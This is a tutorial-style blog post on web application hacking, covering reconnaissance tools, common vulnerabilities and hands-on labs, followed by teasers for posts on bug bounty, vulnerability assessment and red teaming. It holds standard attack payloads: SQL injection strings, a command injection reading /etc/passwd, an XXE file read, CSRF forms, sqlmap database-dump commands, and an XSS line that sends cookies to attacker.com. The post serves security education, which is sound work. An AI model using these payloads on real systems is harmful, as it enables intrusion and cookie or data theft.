Skip to main content

Web Application Hacking

Introduction to Web App Security

Web applications are prime targets for attackers due to their exposure to the internet. This guide covers vulnerabilities, exploitation techniques, and defenses.


1. Web App Reconnaissance

Information Gathering

- WHOIS Lookup (Domain details)

- Subdomain Enumeration (Sublist3r, Amass)

- Technology Stack Detection (Wappalyzer, BuiltWith)

- Directory Bruteforcing (Dirb, Gobuster)

- Wayback Machine (Historical snapshots)


Tools

bash

sublist3r -d example.com  

wappalyzer.com  

gobuster dir -u https://example.com -w /path/to/wordlist.txt


2. Common Web Vulnerabilities

A. Injection Attacks

1. SQL Injection (SQLi)

- Classic SQLi: ' OR 1=1 -- -

- Blind SQLi: Time-based/Boolean-based

Tools: SQLmap, Burp Suite

Example:

sql

  SELECT * FROM users WHERE username = 'admin'--' AND password = ''  


2. Command Injection

- Executing OS commands via input fields:

  bash

  ; cat /etc/passwd  


3. Cross-Site Scripting (XSS)

- Stored XSS : <script>alert(1)</script>

-  Reflected XSS : https://example.com/search?q=<script>alert(1)</script>

- DOM XSS: Browser-side script execution

B. Broken Authentication

1. Credential Stuffing

- Using breached passwords

Tools : Hydra, Burp Intruder



2. Session Hijacking

- Stealing cookies via XSS/MITM

Tools : Ferret, Hamster

3. Default Credentials

- admin:admin ,  root:password


C. Sensitive Data Exposure

1. Insecure APIs

- Exposed API keys, tokens

Tools : Postman, Burp Suite

2. Directory Listing

-  /backup, /admin accessible


D. Security Misconfigurations

1. Exposed Admin Panels

-  /admin , /wp-admin

2. Verbose Error Messages

- Leaking stack traces, DB info


E. Cross-Site Request Forgery (CSRF)

- Forcing users to execute unwanted actions:

  html

  <img src="https://bank.com/transfer?amount=1000&to=attacker">   



F. Server-Side Request Forgery (SSRF)

- Accessing internal services:

    https://example.com/fetch?url=http://localhost   

 

G. XML External Entity (XXE)

- Reading local files via XML:

  xml

  <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>  

  

3. Exploitation Techniques

Step 1: Automated Scanning

- Burp Suite (Manual testing)

- OWASP ZAP (Automated scanning)

- Nikto (Vulnerability scanner)

Step 2: Manual Testing

- Intercepting requests (Burp Proxy)

- Tampering parameters (Headers, cookies)

- Fuzzing inputs (Wfuzz, FFUF)


Step 3: Post-Exploitation

- Privilege escalation

- Data exfiltration

- Persistence mechanisms


4. Hands-On Labs

Lab 1: SQL Injection with SQLmap

1. Find vulnerable parameter:

   bash

   sqlmap -u "https://example.com/login?id=1" --dbs  

2. Dump database:

   bash

   sqlmap -u "https://example.com/login?id=1" -D dbname --tables    

   

Lab 2: XSS Exploitation

1. Inject payload in search box:

   html

   <script>alert(document.cookie)</script>  

2. Steal cookies:

   javascript

   fetch('https://attacker.com/log?cookie=' + document.cookie)    


Lab 3: CSRF Attack

1. Craft malicious HTML:

   html

    <form action="https://bank.com/transfer" method="POST">

     <input type="hidden" name="amount" value="1000">

     <input type="hidden" name="to" value="attacker">

   </form>

   <script>document.forms[0].submit()</script>      

   

5. Defensive Measures

Secure Coding Practices

- Input validation

- Prepared statements (SQLi)

- CSP headers (XSS)

- CSRF tokens


Security Tools

- WAFs (ModSecurity, Cloudflare)

- DAST/SAST Scanners (Checkmarx, SonarQube)

- Honeypots (Glastopf)


6. Bug Bounty & Ethical Hacking

Platforms : HackerOne, Bugcrowd

Methodology:

  1. Recon

  2. Vulnerability Scanning

  3. Exploitation

  4. Reporting

Conclusion

- Web app hacking involves recon, exploitation, and post-exploitation.

- OWASP Top 10 is a must-know for pentesters.

- Automated tools + manual testing = Best approach.


🔹 Next Steps:

Module 8: Wireless Network Hacking

- Practice on DVWA, WebGoat.

- Try HTB, TryHackMe web challenges.

- Learn advanced Burp Suite techniques.


Would you like a deep dive into bypassing WAFs? 🚀

Comments

Post a Comment

Popular posts from this blog

Bug Bounty Hunter – The Professional Vulnerability Hunter

A Bug Bounty Hunter is a cybersecurity researcher who finds and reports security flaws in websites, apps, and systems in exchange for cash rewards (bounties) from companies like Google , Facebook , and Uber.  💰 How Bug Bounties Work    1. Target Selection – Choose a program (e.g., HackerOne, Bugcrowd).   2. Recon & Testing – Hunt for vulnerabilities (e.g., SQLi, XSS, RCE).   3. Submit a Report – Document the bug with PoC (Proof of Concept).   4. Get Paid – Rewards range from  $50 to $500,000+ per bug.   🔥 Top Bug Bounty Platforms  |    Platform     |     Popular Programs   |    Avg. Payout |   |-------------|---------------------|------------|   |    HackerOne   | Uber, Twitter, GitHub | $500–$20K |   |     Bugcrowd    | AWS, Tesla, Cisco | $300–$15K |   |    Intigriti...
Post a Comment
Read more

Vulnerability Assessor – The Proactive Security Specialist

A Vulnerability Assessor is a cybersecurity professional who identifies, classifies, and prioritizes security weaknesses in systems, networks, and applications before attackers exploit them. Unlike penetration testers (who exploit flaws), assessors focus on discovery and risk analysis.  🔍 Core Responsibilities 1. Vulnerability Scanning       - Run automated scans (Nessus, Qualys, OpenVAS).      - Identify CVEs, misconfigurations, and outdated software.   2. Risk Assessment & Prioritization       - Rate vulnerabilities using CVSS scores.      - Focus on critical risks (e.g., RCE, SQLi).   3. Compliance Auditing     - Check adherence to PCI DSS, HIPAA, NIST.   4. Reporting & Remediation Guidance    - Provide actionable fixes (patching, hardening).  🛠️ Key Tools & Technologies |    Category       |...
Post a Comment
Read more

Red Teamer – The Elite Offensive Security Role

A Red Teamer is an advanced cybersecurity professional who simulates real-world attacks like advanced threat actors (APT groups, nation-states) to test an organization's defenses. Unlike penetration testers (who focus on finding vulnerabilities), Red Teams emulate stealthy, targeted attacks to evade detection.   🔥 Core Responsibilities   1. Adversary Emulation    - Mimic real APTs (MITRE ATT&CK framework).      - Use custom malware, C2 frameworks (Cobalt Strike, Sliver).   2. Physical & Social Engineering      - Phishing, USB drops, impersonation attacks.   3. Evasion & Lateral Movement      - Bypass EDR/XDR, AV, and SIEM detection.      - Privilege escalation, domain persistence.   4. Reporting & Purple Teaming      - Help Blue Team improve detection rules.  🛠️ Top Red Team Tools |   Category...
Post a Comment
Read more